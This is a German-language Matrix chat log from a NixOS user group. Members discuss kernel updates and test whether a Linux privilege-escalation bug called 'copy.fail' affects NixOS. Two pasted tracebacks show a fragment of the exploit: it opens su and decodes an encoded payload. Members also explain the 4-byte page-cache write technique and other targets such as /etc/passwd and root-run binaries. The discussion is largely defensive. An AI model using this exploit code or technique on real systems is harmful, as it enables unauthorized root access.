!GczNDVOkmUAxrFFnCg:maralorn.de

❄️ Nix Da(rmstadt)

130 Members
Nächstes Treffen: 20.04.2026.(<https://md.darmstadt.ccc.de/nixda-202604>) | Dekoratives Systemmanagement. How dare you … wenn Nix hilft | Use `/roomnick` for silly sentiments. | https://nix-cheatsheet.pixie.homes71 Servers

Load older messages


SenderMessageTime
28 Apr 2026
@hexa:lossy.networkhexadas muss reichen19:38:33
30 Apr 2026
@hexa:lossy.networkhexahttps://github.com/NixOS/nixpkgs/pull/515023 hat das kernel update für stable (6.12.85)10:41:56
@atemu12:matrix.orgAtemu copy.fail kann uns sowieso nix!!1!

$ python /tmp/copy_fail_exp.py
Traceback (most recent call last):
  File "/tmp/copy_fail_exp.py", line 8, in <module>
    f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'

(/j)
11:03:57
@hexa:lossy.networkhexahab schon geranted, dass mal wieder niemand shutil.which nutzt11:04:36
@hexa:lossy.networkhexahatte auf vielen unstable hosts einfach schon 6.18.22 oder neuer11:04:52
@atemu12:matrix.orgAtemuUhm, btw. ich hab gehört wir haben seit neustem Root auf unserem shitty Android Tablet? :D11:06:21
@atemu12:matrix.orgAtemu(inb4 kernel ist zu alt um die vuln zu haben)11:06:46
@benjaminsparks:chat.alugha.appBen Sparksthe Python stdlib is truly a graveyard of massive proportions, aber shutil.which ist was gutes 😄11:07:36
@atemu12:matrix.orgAtemu Uhm, huh. o.o

$ python /tmp/copy_fail_exp.py
Traceback (most recent call last):
  File "/tmp/copy_fail_exp.py", line 8, in <module>
    f=g.open("/run/wrappers/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
PermissionError: [Errno 13] Permission denied: '/run/wrappers/bin/su'
11:09:06
@hexa:lossy.networkhexadu darfst nur x, nicht r11:10:27
@hexa:lossy.networkhexader exploit will aber r11:10:32
@atemu12:matrix.orgAtemuRight11:11:13
@atemu12:matrix.orgAtemuSo NixOS not vulnerable?11:11:22
@atemu12:matrix.orgAtemuOder ist mein kernel einfach zu neu?11:11:35
@hexa:lossy.networkhexaes geht gar nicht um suid binaries11:11:42
@hexa:lossy.networkhexaes geht darum, dass du eine read confusion erzeugen kannst11:11:50
@hexa:lossy.networkhexaindem du mit dem page cache tamperst11:12:10
@atemu12:matrix.orgAtemuIch hab's mir noch nicht angeschaut, aber man braucht dann denke ich immernoch eine SUID binary?11:13:22
@hexa:lossy.networkhexadas ist ein möglicher effekt, den du offensichtlich damit erreichen kannst11:15:54
@hexa:lossy.networkhexaeine gute demo quasi11:16:04
@hexa:lossy.networkhexatrifft aber eben noch viele andere stellen, die weniger offensichtlich sind11:16:30
@atemu12:matrix.orgAtemuAh, right; du könntest auch eine beliebige andere binary, die du lesen darfst und irgendwie von root ausgeführt wird nehmen11:16:47
@hexa:lossy.networkhexa

4 byte page-cache write

11:16:54
@atemu12:matrix.orgAtemue.g. scheduled backup job11:16:56
@hexa:lossy.networkhexaist das exploit11:16:57
@hexa:lossy.networkhexajoa, oder den read von /etc/passwd11:17:12
@hexa:lossy.networkhexaoder /etc/group11:17:19
@atemu12:matrix.orgAtemuOH.11:17:35
@atemu12:matrix.orgAtemu Android ist wohl leider nicht vulnerable, weil die das algif_aead module nicht verwenden oder laden 11:36:42
@hxr404:tchncs.de@hxr404:tchncs.de left the room.13:41:56

There are no newer messages yet.


Back to Room ListRoom Version: 6